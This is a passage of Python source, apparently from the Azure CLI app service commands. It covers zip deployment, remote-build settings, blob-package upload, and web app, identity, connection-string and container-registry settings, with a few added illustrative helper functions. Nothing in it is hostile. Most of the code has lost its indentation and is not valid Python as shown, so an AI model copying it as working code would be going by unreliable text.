if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
website_run_from_package = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if not ((enable_oryx_build is True) and (scm_do_build_during_deployment is True)):
logger.warning("Setting ENABLE_ORYX_BUILD to true")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=true",
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
time.sleep(5)
if website_run_from_package is not None:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
time.sleep(5)
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if not ((enable_oryx_build is False) and (scm_do_build_during_deployment is False)):
logger.warning("Setting ENABLE_ORYX_BUILD to false")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=false",
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
time.sleep(5)
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(src_plan_info) or is_plan_elastic_premium(src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(dest_plan_instance) or is_plan_elastic_premium(dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecated method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
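# Hedged illustration (added, not part of the original module): single container images get
# a DOCKER| prefix, multicontainer configs get their config-type prefix, blanks stay blank.
def _example_format_fx_version():
    assert _format_fx_version('nginx') == 'DOCKER|nginx'
    assert _format_fx_version('DOCKER|nginx') == 'DOCKER|nginx'
    assert _format_fx_version('eNcOdEdCoMpOsE=', 'COMPOSE') == 'COMPOSE|eNcOdEdCoMpOsE='
    assert _format_fx_version('   ') == ' '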
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
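# Hedged illustration (added, not part of the original module): a value only counts as a URL
# when scheme, host and path are all present.
def _example_url_validator():
    assert url_validator('https://example.com/docker-compose.yml')
    assert not url_validator('example.com/docker-compose.yml')  # no scheme
    assert not url_validator('docker-compose.yml')              # plain file name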
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
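# Hedged illustration (added, not part of the original module): linux_fx_version for a
# multicontainer app carries plain base64 of the compose file bytes; the file name below is
# a throw-away example.
def _example_multicontainer_encoding(path='example-docker-compose.yml'):
    from base64 import b64decode
    with open(path, 'wb') as f:
        f.write(b'version: "3"\n')
    assert b64decode(_get_linux_multicontainer_encoded_config_from_file(path)) == b'version: "3"\n'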
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None,
linux_fx_version=None, windows_fx_version=None, reserved_instance_count=None, php_version=None, # pylint: disable=unused-argument
python_version=None, net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None, # pylint: disable=unused-argument
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if reserved_instance_count is not None:
reserved_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', reserved_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['reserved_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecated method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
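# Hedged illustration (added, not part of the original module): each app setting is reported
# with its value and whether it is sticky to the slot.
def _example_build_app_settings_output():
    out = _build_app_settings_output({'FOO': 'bar'}, ['FOO'])
    assert out == [{'name': 'FOO', 'value': 'bar', 'slotSetting': True}]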
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must provide both --multicontainer-config-file FILE and --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
        raise CLIError("Either no container registry or more than one was found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
